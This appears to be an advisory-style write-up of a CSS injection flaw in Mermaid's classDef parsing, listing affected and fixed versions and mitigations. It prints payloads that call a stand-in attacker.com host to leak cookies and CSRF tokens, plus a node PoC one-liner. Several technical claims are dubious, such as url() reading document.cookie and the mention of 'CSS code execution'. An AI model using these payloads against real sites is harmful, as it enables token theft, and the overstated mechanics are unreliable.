Mermaid, Improper sanitization of classDefs leads to CSS injection, N/A (Moderate)

Listen to this Post

How the CVE works (technical details):

The vulnerability exists in Mermaid versions 11.0.0-alpha.1 through 11.14.0 and all 10.x up to 10.9.5.
State diagrams and other diagram types that accept user-controlled style strings route input through the `createCssStyles` parser.
The parser captures `classDef` values using an unrestricted regular expression without sanitization.
When a user supplies a `classDef` definition containing a closing curly brace }, it prematurely terminates the generated CSS selector.
Everything after the `}` is interpreted as a new, arbitrary CSS rule within the page’s style context.
The vulnerable flow: `classDef` → `addStyleClass()` → `createCssStyles()` → `style.innerHTML` (mermaidAPI.ts:418).
No escaping or validation is applied to the `classDef` value before insertion into the DOM’s innerHTML.
An attacker can inject CSS rules that execute callbacks, read attributes, or modify page appearance.
Example payload: `classDef evil } body { background: url(https://attacker.com/steal?cookie=document.cookie); }`
This closes the original rule and injects a new rule that exfiltrates cookies via `url()` background request.
CSS `:has()` selector can be abused to read DOM attributes (e.g., CSRF tokens, hidden inputs).
The PoC live demo (mermaid.live edit link) shows injection via a crafted diagram.
Attack requires no special privileges – only the ability to render a Mermaid diagram with unsanitized input.
The flaw is in the client‑side CSS parsing, not the diagram generation logic.
It bypasses basic filtering because the regex does not escape `}` or `;` characters.
Successful injection leads to persistent CSS code execution in the victim’s browser context.
Any application embedding Mermaid with user‑supplied diagram data is at risk unless sandboxed.
The issue was fixed by patching the regex and adding proper escaping in versions 11.15.0 and 10.9.6.

dailycve form

Platform: Mermaid (mermaid-js)
Version: 11.0.0-11.14.0 and 10.9.5
Vulnerability: classDefs CSS injection
Severity: Moderate
date: May 11 2026

Prediction: May 11 2026

What Undercode Say:

Check vulnerable Mermaid version in package.json
grep '"mermaid"' package.json | grep -E '"(10.[0-9].[0-5]|11.[0-9].([0-9]|1[0-4]))"'
Extract all classDef inputs from user diagrams for manual review
grep -oP 'classDef\s+\S+\s+{[^}]}' user_diagram.mmd
Test PoC (requires node with mermaid 11.14.0)
node -e "const mermaid = require('mermaid'); mermaid.initialize({startOnLoad:false}); const diagram = 'stateDiagram\n classDef evil } body { background: url(https://attacker.com); }'; mermaid.render('test', diagram);"

how Exploit:

Craft a state diagram containing a `classDef` with a closing bracket and arbitrary CSS, e.g.,
stateDiagram-v2 classDef x } input[name=csrf] { display: block; background: url(//attacker.com/log?value=attr(value)); }.
When rendered by a vulnerable Mermaid instance, the injected CSS rule activates, exfiltrating CSRF token values via attribute selector and `url()` callback.

Protection from this CVE

Upgrade to Mermaid 11.15.0 or 10.9.6.

If patching impossible, set `securityLevel: “sandbox”` in Mermaid config to render diagrams inside a sandboxed `